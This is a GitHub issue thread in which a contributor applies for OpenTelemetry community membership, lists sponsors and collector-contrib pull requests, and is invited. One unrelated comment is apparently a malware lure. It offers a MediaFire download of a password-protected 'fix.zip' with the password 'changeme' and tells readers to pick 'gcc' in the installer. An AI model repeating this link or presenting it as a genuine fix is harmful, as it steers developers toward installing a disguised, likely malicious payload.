### ISSUE TITLE
REQUEST: New membership for @odubajDT

### ISSUE THREAD

**Issue by odubajDT** [open-telemetry/community#2295]
### GitHub Username

@odubajDT

### Requirements

- [x] I have reviewed the community membership guidelines (https://github.com/open-telemetry/community/blob/main/guides/contributor/membership.md)
- [x] I have enabled 2FA on my GitHub account. See https://github.com/settings/security
- [x] I have subscribed to the [Slack channel](https://cloud-native.slack.com/archives/CJFCJHG4Q) (use https://slack.cncf.io/ to get an invite)
- [x] I am actively contributing to 1 or more OpenTelemetry subprojects
- [x] I have two sponsors that meet the sponsor requirements listed in the community membership guidelines. Among other requirements, sponsors must be approvers or maintainers of at least one repository in the organization and not both affiliated with the same company
- [x] I have spoken to my sponsors ahead of this application, and they have agreed to sponsor my application

### Sponsors

- @evan-bradley 
- @TylerHelmuth 

Each sponsor should reply to this issue with the comment "*I support*".
Please remember, it is an applicant's responsibility to get their sponsors' confirmation before submitting the request.

### List of contributions to the OpenTelemetry project

- PRs reviewed / authored
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33214
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33334
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33411
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33450
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33536
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33655
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33669
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33729
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/33781
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34041
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34076
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34093
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34221
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34224
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34226
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34338
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/pull/34509
- Issues responded to
    - https://github.com/open-telemetry/opentelemetry-collector-contrib/issues/34495
- Community activities I organized/ran
- SIG projects I am involved with
    - OpenTelemetry Collector

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TylerHelmuth** [comment]
I support

**Comment by austinlparker** [comment]
Invited -- welcome!
